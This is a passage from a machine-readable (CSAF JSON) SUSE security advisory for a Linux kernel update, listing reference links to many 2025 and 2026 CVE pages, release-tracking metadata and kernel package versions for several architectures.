"summary": "SUSE CVE CVE-2025-38548 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38548/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38550 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38550/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38551 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38551/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38569 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38569/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38589 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38589/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38590 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38590/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38645 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38645/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39817 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39817/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39927 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39927/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40030 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40030/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40045 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40045/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68211 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68218 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68218/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68341 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68341/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68348 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68348/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68356 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68356/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68359 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68359/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68361 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68361/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68368 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68368/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68374 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68374/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68376 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68376/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68735 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68735/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68741 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68741/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68743 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68743/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68778 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68784 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68792 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68792/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68799 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68799/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68802 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68802/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68811 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68811/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68821 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68821/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68822 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68822/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71073 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71073/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71080 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71113 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71126 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71126/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71143 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71148 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22981 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22981/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22982 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22982/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22986 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22986/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22989 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22989/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23002 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23002/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-27T11:51:02Z",
"generator": {
"date": "2026-02-27T11:51:02Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20555-1",
"initial_release_date": "2026-02-27T11:51:02Z",
"revision_history": [
{
"date": "2026-02-27T11:51:02Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-rt-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-rt-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-rt-6.12.0-160000.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"product": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"product_id": "kernel-rt-devel-6.12.0-160000.26.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-devel-6.12.0-160000.26.1.noarch",
"product_id": "kernel-devel-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-macros-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-macros-6.12.0-160000.26.1.noarch",
"product_id": "kernel-macros-6.12.0-160000.26.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-6.12.0-160000.26.1.noarch",
"product": {
"name": "kernel-source-6.12.0-160000.26.1.noarch",
"product_id": "kernel-source-6.12.0-160000.26.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"product_id": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"product": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"product_id": "kernel-default-livepatch-6.12.0-160000.26.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"product": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"product_id": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-extra-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-rt-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"product": {
"name": "kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"product_id": "kernel-rt-devel-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"product": {
